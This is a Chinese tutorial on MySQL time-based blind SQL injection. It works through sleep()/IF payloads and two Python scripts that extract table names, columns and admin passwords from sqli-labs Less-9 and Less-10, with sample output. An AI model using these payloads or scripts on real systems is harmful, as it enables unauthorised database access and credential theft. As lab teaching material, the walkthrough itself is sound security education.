4.延时盲注
延时盲注原理
无法通过页面显示结果判断SQL注入是否执行成功时,可以利用SQL语句执行产生的时间延迟来判断注入语句是否被执行。
只要可以执行延时,那么就可以利用该注入技术
SQL时间型盲注的本质是利用注入的SQL语句造成执行时间延迟:注入语句中包含延时执行的函数,数据库执行该语句时便会产生可观测的延时,注入者根据响应时间长短推断条件的真假。
Mysql中常用的延时执行函数
sleep(num)
benchmark(num,function),例如 benchmark(100000000,rand());注意benchmark()的耗时取决于服务器CPU性能,不如sleep()稳定。
Mysql中常用的判断结构
IF(condition,when_true,when_false)
例如:
select * from admin where id = 1 and (if(length(database())>0,sleep(3),0))
(IF的第三个参数不能省略,否则是语法错误;另外sleep()会对WHERE子句中到达它的每一行执行一次,匹配行数越多总延时越长。)
延时盲注实验
延时注入也是基于逐个字节猜解的技术
-
获得数据库名称长度
id=1' and if(length(database())=7,sleep(3),null)--+
-
获取数据库名称
id=1' and if(substr(database(),1,1)='s',sleep(3),null)--+
-
查看数据表名
id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='a',sleep(3),null)--+
-
查看字段名
id=1' and if(substr((select column_name from information_schema.columns where table_name='admin' limit 0,1),1,1)='u',sleep(3),null)--+
-
数据内容
id=1' and if(substr((select password from admin limit 0,1),1,1)='f',sleep(3),null)--+
-
尝试用burpsuite注入
sqli-labs
less-9
-
判断注入方式
1' and sleep(3)--+  (URL中的+会被解码为空格,使`--+`成为合法的`-- `行注释)
-
python自动化注入:
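"""Time-based blind SQL injection against sqli-labs Less-9 (single-quote string context).

Lab tooling only: point it at a target you are authorised to test.  Each
character of a value is recovered by injecting
``1' and if(substr(<expr>,<pos>,1)='<c>',sleep(N),null)--+`` and treating a
read timeout as "the guess was right".
"""

BASE_URL = "http://localhost/Less-9/?id="
# MySQL compares '<c>' with its default case-insensitive collation, so upper-case
# letters are deliberately left out: with them both 'a' and 'A' would match.
CHARSET = "0123456789-_qwertyuiopasdfghjklzxcvbnm}{"
SLEEP_SECONDS = 3
# A correct guess stalls the server for SLEEP_SECONDS, so the read timeout must
# not exceed it.  On a slow or loaded target raise SLEEP_SECONDS (and the
# timeout with it) rather than lowering the timeout, or hits become false.
TIMEOUT_SECONDS = 3


def make_payload(expr: str, pos: int, char: str) -> str:
    """Return the id value that sleeps iff character `pos` (1-based) of `expr` is `char`."""
    return ("1' and if(substr(" + expr + "," + str(pos) + ",1)='" + char
            + "',sleep(" + str(SLEEP_SECONDS) + "),null)--+")


def probe_timeout(payload: str) -> bool:
    """Send `payload` as the id parameter and report whether the read timed out.

    Only ReadTimeout counts as a hit; a connection failure still propagates so
    an unreachable target is not mistaken for a string of matches.
    """
    import requests  # local import keeps the pure helpers importable without requests

    # The payload is concatenated raw on purpose: the trailing '+' must reach
    # the server so it decodes to the space that completes the '-- ' comment.
    # Passing it through params= would encode it as %2B and break the payload.
    try:
        requests.get(BASE_URL + payload, timeout=TIMEOUT_SECONDS)
    except requests.exceptions.ReadTimeout:
        return True
    return False


def extract(expr: str, probe=probe_timeout, max_len: int = 10, charset: str = CHARSET) -> str:
    """Recover up to `max_len` characters of the scalar SQL expression `expr`.

    `probe` is called with one payload per guess and returns True on a hit.
    Extraction stops at the first position where no candidate matches: that is
    the end of the value, or a character outside `charset`.  The original
    script kept guessing and silently dropped such characters.
    """
    recovered = []
    for pos in range(1, max_len + 1):
        for char in charset:
            if probe(make_payload(expr, pos, char)):
                recovered.append(char)
                break  # one hit per position; stops timing jitter from doubling characters
        else:
            break
    return "".join(recovered)


def main(probe=probe_timeout) -> None:
    """Walk the lab: database name, table names, admin columns, admin rows."""
    db_name = extract("database()", probe)
    if db_name:
        print("database_name:" + db_name)

    for row in range(5):
        table = extract(
            "(select table_name from information_schema.tables"
            " where table_schema=database() limit " + str(row) + ",1)",
            probe,
        )
        if not table:
            break  # past the last table: the subquery yields NULL and nothing matches
        print("table_name:" + table)

    for row in range(5):
        column = extract(
            "(select column_name from information_schema.columns"
            " where table_name='admin' limit " + str(row) + ",1)",
            probe,
        )
        if not column:
            break
        print("column_name:" + column)

    for row in range(5):
        for item in ("id", "username", "password"):
            value = extract(
                "(select " + item + " from admin limit " + str(row) + ",1)",
                probe,
                max_len=50,
            )
            if value:
                print(item + ":" + value)


if __name__ == "__main__":
    main()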
显示内容为: database_name:security table_name:admin table_name:emails table_name:referers table_name:uagents table_name:users column_name:username column_name:password id:1 username:admin password:flag{echjsalfajsfkjasgda}
-
代码审计
Less-10
-
判断注入方式
1" and sleep(3)--+  (sleep()必须带秒数参数;Less-10用双引号闭合字符串)
- 闭合双引号
- 延时注入
-
python自动注入编写
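"""Time-based blind SQL injection against sqli-labs Less-10 (double-quote string context).

Lab tooling only: run it against a target you are authorised to test.  Each
character is recovered with
``1" and if(ord(mid(<expr>,<pos>,1))=<code>,sleep(N),1)--+`` and a read
timeout is taken as "the guess was right".
"""

BASE_URL = 'http://localhost/Less-10/?id='
# ord() turns the comparison into an exact integer match, so upper-case letters
# can be included without double-matching.  The original set lacked 'b' and
# 'n', which is why it printed "admi", "uagets" and "userame".
CHARSET = "0123456789_-qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM}{"
SLEEP_SECONDS = 3
# The read timeout must not exceed SLEEP_SECONDS, otherwise a correct guess
# returns before the timeout fires and is counted as a miss.
TIMEOUT_SECONDS = 3
ADMIN_TABLE_HEX = "0x61646D696E"  # 'admin' as a hex literal, so the payload needs no quotes


def make_payload(expr: str, pos: int, char: str) -> str:
    """Return the id value that sleeps iff character `pos` (1-based) of `expr` is `char`."""
    return ('1" and if(ord(mid(' + expr + ',' + str(pos) + ',1))=' + str(ord(char))
            + ',sleep(' + str(SLEEP_SECONDS) + '),1)--+')


def probe_timeout(payload: str) -> bool:
    """Send `payload` as the id parameter and report whether the read timed out.

    Only ReadTimeout counts as a hit; connection errors propagate unchanged.
    """
    import requests  # local import keeps the pure helpers importable without requests

    # Raw concatenation is deliberate: the trailing '+' has to reach the server
    # as a space to complete the '-- ' comment; params= would encode it as %2B.
    try:
        requests.get(BASE_URL + payload, timeout=TIMEOUT_SECONDS)
    except requests.exceptions.ReadTimeout:
        return True
    return False


def extract(expr: str, probe=probe_timeout, max_len: int = 20, charset: str = CHARSET) -> str:
    """Recover up to `max_len` characters of the scalar SQL expression `expr`.

    Positions start at 1: mid(x,0,1) is always the empty string, so the
    original loop that began at 0 wasted a full pass and lost one position of
    its budget.  Extraction stops at the first position with no hit (end of
    the value, or a character outside `charset`).
    """
    recovered = []
    for pos in range(1, max_len + 1):
        for char in charset:
            if probe(make_payload(expr, pos, char)):
                recovered.append(char)
                break  # one hit per position; stops timing jitter from doubling characters
        else:
            break
    return "".join(recovered)


def main(probe=probe_timeout) -> None:
    """Walk the lab: table names, admin columns, admin passwords."""
    for row in range(5):
        table = extract(
            "(select table_name from information_schema.tables"
            " where table_schema=database() limit " + str(row) + ",1)",
            probe,
        )
        if not table:
            break  # past the last table: the subquery yields NULL and nothing matches
        print("table_name:" + table)

    for row in range(10):
        column = extract(
            "(select column_name from information_schema.columns"
            " where table_name=" + ADMIN_TABLE_HEX + " limit " + str(row) + ",1)",
            probe,
        )
        if not column:
            break
        print("column_name:" + column)

    for row in range(10):
        # 50 positions: the 19-position budget of the original truncated the flag.
        password = extract(
            "(select password from admin limit " + str(row) + ",1)",
            probe,
            max_len=50,
        )
        if not password:
            break
        print("password_value:" + password)


if __name__ == "__main__":
    main()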
显示: table_name:admi table_name:emails table_name:referers table_name:uagets table_name:users column_name:userame column_name:password password_value:flag{echjsalfajsfkj
(结果有缺字:上面脚本的chars里没有'n'(也没有'b'),所以admin、uagents、username中的n全部丢失;密码只取到19位,是因为位置循环写成range(0,20),而mid()的位置从1开始,位置0取不到任何字符。)
-
代码审计